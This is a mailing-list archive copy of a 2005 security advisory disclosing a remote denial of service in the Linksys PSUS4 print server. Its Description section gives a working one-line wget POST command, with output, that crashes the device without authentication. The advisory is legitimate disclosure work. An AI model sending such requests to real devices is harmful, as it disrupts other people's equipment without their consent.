[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    [ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4
From:       laurent oudot <oudot () rstack ! org>
Date:       2005-02-03 22:49:16
Message-ID: 20050203224916.32663.qmail () www ! securityfocus ! com
[Download RAW message or body]



- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Rstack Public Security Advisory                           RSTACK SA200502-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://rstack.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Linksys PSUS4 remote Denial of Service
      Date: February 02, 2005
        ID: 200502-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -


Background
==========

PSUS4 is one of the small embedded Linksys wired print servers.

Affected products
=================

Model Name: PSUS4 (not tested against others)
Firmware Version: 6032 (not tested against others)

Description
===========

Rstack team found a tiny denial of service on the Linksys PSUS4. This device has \
problems to handle some weird ugly HTTP requests. No password needed.

Here is an example, to crash a remote PSUS4 :

$ wget --post-data="Br1Ce2N1c3" http://192.168.1.2/
--23:10:05--  http://192.168.1.2/
           => `index.html'
Connecting to 192.168.1.2:80... connected.
HTTP request sent, awaiting response...

=> And the PSUS4 is crashed.


Impact
======

A remote attacker could crash the device (DOS).

Workaround
==========

There is no official workaround at that time. Linksys has been contacted and a patch \
should be available in the future (*). In needed, you can try to filter incoming \
requests by using a specific dedicated reverse proxy, but that might be a too big \
solution for such a little device (hint: a reboot will be necessary after each \
crash).

(*) "ou pas"...


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic